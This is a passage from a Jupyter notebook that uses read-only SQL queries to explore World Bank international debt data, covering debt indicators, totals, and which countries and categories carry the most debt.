debts. Knowing about these various debt indicators will help us to understand the areas in which a country can possibly be indebted to. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT DISTINCT indicator_code AS distinct_debt_indicators FROM international_debt ORDER BY distinct_debt_indicators;", " * postgresql:///international_debt\n25 rows affected.\n" ] ], [ [ "## 4. Totaling the amount of debt owed by the countries\n<p>As mentioned earlier, the financial debt of a particular country represents its economic state. But if we were to project this on an overall global scale, how will we approach it?</p>\n<p>Let's switch gears from the debt indicators now and find out the total amount of debt (in USD) that is owed by the different countries. 
This will give us a sense of how the overall economy of the entire world is holding up. The query below divides the sum by 1,000,000, so the total is reported in millions of USD.</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT ROUND(SUM(debt)/1000000, 2) AS total_debt\nFROM international_debt; ", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 5. Country with the highest debt\n<p>\"Human beings cannot comprehend very large or very small numbers. It would be useful for us to acknowledge that fact.\" - <a href=\"https://en.wikipedia.org/wiki/Daniel_Kahneman\">Daniel Kahneman</a>. That is more than <em>3 million <strong>million</strong></em> USD, an amount which is really hard for us to fathom. </p>\n<p>Now that we have the exact total of the amounts of debt owed by several countries, let's find out the country that owes the highest amount of debt along with the amount. <strong>Note</strong> that this debt is the sum of different debts owed by a country across several categories. This will help us understand more about the country in terms of its socio-economic situation. We can also find out the category in which the country owes its highest debt. But we will leave that for now. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n    country_name, \n    ROUND(SUM(debt),2) AS total_debt\nFROM international_debt\nGROUP BY country_name\nORDER BY total_debt DESC\nLIMIT 1;", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 6. Average amount of debt across indicators\n<p>So, it was <em>China</em>. A more in-depth breakdown of China's debts can be found <a href=\"https://datatopics.worldbank.org/debt/ids/country/CHN\">here</a>. </p>\n<p>We now have a brief overview of the dataset and a few of its summary statistics. We already have an idea of the different debt indicators in which the countries owe their debts. We can dig even further to find out, on average, how much debt a country owes. This will give us a better sense of the distribution of the amount of debt across different indicators.</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n    indicator_code AS debt_indicator,\n    indicator_name,\n    ROUND(AVG(debt),2) AS average_debt\nFROM international_debt\nGROUP BY debt_indicator, indicator_name\nORDER BY average_debt DESC\nLIMIT 10;", " * postgresql:///international_debt\n10 rows affected.\n" ] ], [ [ "## 7. The highest amount of principal repayments\n<p>We can see that the indicator <code>DT.AMT.DLXF.CD</code> tops the chart of average debt. This category includes repayment of long-term debts. Countries take on long-term debt to acquire immediate capital. More information about this category can be found <a href=\"https://datacatalog.worldbank.org/principal-repayments-external-debt-long-term-amt-current-us-0\">here</a>. </p>\n<p>An interesting observation in the above finding is that there is a huge difference in the amounts of the indicators after the second one. This indicates that the first two indicators might be the most severe categories in which the countries owe their debts.</p>\n<p>We can investigate this a bit further to find out which country owes the highest amount of debt in the category of long-term debts (<code>DT.AMT.DLXF.CD</code>). Since not all the countries suffer from the same kind of economic disturbances, this finding will allow us to understand that particular country's economic condition a bit more specifically.
</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n    country_name, \n    indicator_name, \n    ROUND(debt, 2)\nFROM international_debt\nWHERE debt = (SELECT \n                  MAX(debt)\n              FROM international_debt\n              WHERE indicator_code = 'DT.AMT.DLXF.CD');", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 8. The most common debt indicator\n<p>China has the highest amount of debt in the long-term debt (<code>DT.AMT.DLXF.CD</code>) category. This is verified by <a href=\"https://data.worldbank.org/indicator/DT.AMT.DLXF.CD?end=2018&most_recent_value_desc=true\">The World Bank</a>. It is often a good idea to verify our analyses like this since it validates that our investigations are correct. </p>\n<p>We saw that long-term debt is the topmost category when it comes to the average amount of debt. But is it the most common indicator in which the countries owe their debt? Let's find that out. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n    indicator_name,\n    COUNT(indicator_code) AS indicator_count\nFROM international_debt\nGROUP BY indicator_code, indicator_name\nORDER BY indicator_count DESC\nLIMIT 20;", " * postgresql:///international_debt\n20 rows affected.\n" ] ], [ [ "## 9. Other viable debt issues and conclusion\n<p>There are a total of six debt indicators in which all the countries listed in our dataset have taken debt. The indicator <code>DT.AMT.DLXF.CD</code> is also in the list. So, this gives us a clue that all these countries are suffering from a common economic issue. But that is not the end of the story; it is only a part of it. </p>\n<p>Let's change tracks from <code>debt_indicator</code>s now and focus on the amount of debt again. Let's find out the maximum amount of debt across the indicators along with the respective country names. With this, we will be in a position to identify the other plausible economic issues a country might be going through. By the end of this section, we will have found out the debt indicators in which a country owes its highest debt. </p>\n<p>In this notebook, we took a look at debt owed by countries across the globe. We extracted a few summary statistics from the data and unraveled some interesting facts and figures. We also validated our findings to make sure the investigations are correct.</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n    country_name, \n    indicator_code, \n    ROUND(MAX(debt), 2) AS maximum_debt\nFROM international_debt\nGROUP BY country_name, indicator_code\nORDER BY maximum_debt DESC\nLIMIT 10;", " * postgresql:///international_debt\n10 rows affected.\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]